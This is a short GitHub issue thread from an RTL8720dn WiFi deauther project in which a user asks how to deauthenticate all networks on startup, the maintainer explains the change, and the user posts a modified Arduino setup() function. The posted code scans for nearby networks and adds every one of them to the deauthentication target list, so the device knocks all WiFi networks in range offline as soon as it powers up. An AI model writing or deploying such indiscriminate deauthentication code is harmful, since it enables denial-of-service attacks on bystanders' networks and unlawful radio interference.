tesa-klebeband/RTL8720dn-Deauther #45: Deauth all networks on startup

atlab95, 2025-03-27:
is it possible?

tesa-klebeband, 2025-03-27:
You'd have to modify the code in order to do this. When the WiFi scan is complete, you could add the networks all to the deauth WiFi vector.

atlab95, 2025-03-27:
ok this is the modified piece of code if anyone want to try
`void setup() {
  pinMode(LED_R, OUTPUT);
  pinMode(LED_G, OUTPUT);
  pinMode(LED_B, OUTPUT);

  DEBUG_SER_INIT();
  WiFi.apbegin(ssid, pass, (char *)String(current_channel).c_str());
  

  while (scanNetworks()) {
    DEBUG_SER_PRINT("Scanning failed, retrying...\n");
    delay(1000);
  }

  if (scan_results.size() == 0) {
    DEBUG_SER_PRINT("No networks found!\n");

    digitalWrite(LED_R, HIGH);
    delay(500);
    digitalWrite(LED_R, LOW);
    delay(500);
  } else {
    DEBUG_SER_PRINT("Found " + String(scan_results.size()) + " networks\n");
    
    #ifdef DEBUG
    for (uint i = 0; i < scan_results.size(); i++) {
      DEBUG_SER_PRINT(scan_results[i].ssid + " ");
      for (int j = 0; j < 6; j++) {
        if (j > 0) DEBUG_SER_PRINT(":");
        DEBUG_SER_PRINT(scan_results[i].bssid[j], HEX);
      }
      DEBUG_SER_PRINT(" " + String(scan_results[i].channel) + " ");
      DEBUG_SER_PRINT(String(scan_results[i].rssi) + "\n");
    }
    #endif

    for (uint i = 0; i < scan_results.size(); i++) {
      deauth_wifis.push_back(i);
    }
    deauth_reason = 2;
  }

  server.begin();
  digitalWrite(LED_R, HIGH);
}`

closed 2025-03-27 by atlab95